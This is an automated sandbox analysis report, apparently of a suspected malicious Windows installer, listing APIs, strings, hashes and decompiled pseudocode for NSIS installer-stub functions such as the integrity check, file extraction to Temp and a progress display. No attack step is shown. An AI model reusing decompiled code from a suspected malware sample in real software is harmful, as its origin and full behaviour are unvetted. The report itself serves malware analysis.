lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
LoadImageW.USER32 ref: 00403D31

Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E

RegisterClassW.USER32 ref: 00403D6E
SystemParametersInfoW.USER32 ref: 00403D86
CreateWindowExW.USER32 ref: 00403DBB
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
GetClassInfoW.USER32 ref: 00403E1D
GetClassInfoW.USER32 ref: 00403E2A
RegisterClassW.USER32 ref: 00403E33
DialogBoxParamW.USER32 ref: 00403E52

Strings

Call, xrefs: 00403C91, 00403C9A, 00403CA8, 00403CF7, 00403CFD
RichEdit, xrefs: 00403E24
.DEFAULT\Control Panel\International, xrefs: 00403C35
RichEd20, xrefs: 00403DF7
.exe, xrefs: 00403CD7
Control Panel\Desktop\ResourceLocale, xrefs: 00403BFD
1033, xrefs: 00403BE9, 00403C45
RichEdit20W, xrefs: 00403E15, 00403E1B
RichEd32, xrefs: 00403E05
_Nb, xrefs: 00403D4D, 00403DB5
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BCE
C:\Users\user\AppData\Local\Temp, xrefs: 00403C59, 00403C61, 00403D04, 00403D0A, 00403D1A

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4000614727
Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe";
				 *0x7a8a6c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe", 0x400);
				_t89 = E0040600A(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040651A(0x7b4800, _t91);
				E0040651A(0x7b7000, E00405E35(0x7b4800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x79f704 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x7a8a74 - _t82;
					if( *0x7a8a74 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40385a
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034C2( *0x7a8a74 + 0x1c);
						_t35 =  &_v24; // 0x40385a
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a70 = _t94;
							 *0x7a8a78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a7c =  *0x7a8a7c + 1;
								__eflags =  *0x7a8a7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034C2( *0x7936f8);
					_t65 = E004034AC( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034AC(0x78b6f8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a74;
						if( *0x7a8a74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FC5( &_v44, 0x78b6f8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x7936f8; // 0x4fcbb
						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x79f704; // 0x4fcbf
						if(__eflags < 0) {
							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
						}
						 *0x7936f8 =  *0x7936f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\aSsc9zh1ex.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\aSsc9zh1ex.exe,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
soft, xrefs: 0040316B
C:\Users\user\Desktop\aSsc9zh1ex.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Null, xrefs: 00403174
Inst, xrefs: 00403162
Z8@, xrefs: 00403227, 00403242
Error launching installer, xrefs: 004030CD
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
API String ID: 2803837635-1494054606
Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E60( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
				} else {
					E0040651A();
				}
				E004067A1(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406850(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FE5(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040557C(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ae8;
						goto L32;
					} else {
						E0040651A("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp", _t83);
						E0040651A(_t83, _t81);
						E00406557(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040651A(_t83, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp");
						_t64 = E00405B7A("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040557C();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
				 *0x7a8b14 =  *0x7a8b14 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x7a8b14 =  *0x7a8b14 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B7A();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Strings

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll$Call
API String ID: 1941528284-1623154239
Opcode ID: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
Opcode Fuzzy Hash: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x797700;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034C2( *0x7a8ab8 + _t62);
				}
				if(E004034AC( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004034AC(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004034AC(0x793700, _t97) == 0) {
								goto L41;
							}
							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce58 =  *0x40ce58 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce40 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004034AC(0x793700, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce30 = 0x793700;
						 *0x40ce34 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce38 = _t94;
							 *0x40ce3c = _v12;
							_t74 = E00406A42(0x40ce30);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce38; // 0x79bd28
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E0040557C(0,  &_v152); // executed
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce38; // 0x79bd28
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E004060BC(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x0040349a
0x0040349a
0x00000000
0x0040330e
0x00403312
0x00403447
0x0040348a
0x0040348c
0x0040348c
0x00403498
0x0040349f
0x004034a2
0x00000000
0x00000000
0x00000000
0x00000000
0x00403498
0x0040344c
0x00000000
0x00000000
0x0040344e
0x00403451
0x00403454
0x00403457
0x00403459
0x00403459
0x00403469
0x00000000
0x00000000
0x00403470
0x00403477
0x00403441
0x00403441
0x0040349c
0x0040349c
0x00000000
0x0040349c
0x00403479
0x0040347c
0x00403483
0x00000000
0x00000000
0x00000000
0x00403485
0x00000000
0x00403451
0x0040331e
0x00403320
0x00403327
0x00403327
0x0040332e
0x00403334
0x0040333b
0x0040333e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403344
0x00403344
0x00403344
0x0040334c
0x0040334e
0x0040334e
0x0040335f
0x00000000
0x00000000
0x00403365
0x00403368
0x0040336e
0x00403374
0x00403374
0x0040337f
0x00403385
0x0040338a
